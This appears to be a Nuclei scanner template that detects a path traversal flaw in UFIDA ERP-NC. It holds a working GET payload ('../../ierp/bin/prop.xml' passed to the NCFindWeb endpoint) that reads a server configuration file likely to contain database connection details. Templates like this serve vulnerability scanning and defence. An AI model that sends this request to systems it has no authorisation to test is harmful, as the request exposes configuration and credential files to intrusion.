id: wooyun-path-traversal

info:
  name: Wooyun Path Traversal
  author: pikpikcu
  severity: high
  reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
  description: |
    A general document of UFIDA ERP-NC contains a vulnerability
    (affecting a large number of well-known school government and enterprise cases
    such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo)
  tags: lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - <DataSourceClassName>
          - </DataSourceClassName>
        part: body
        condition: and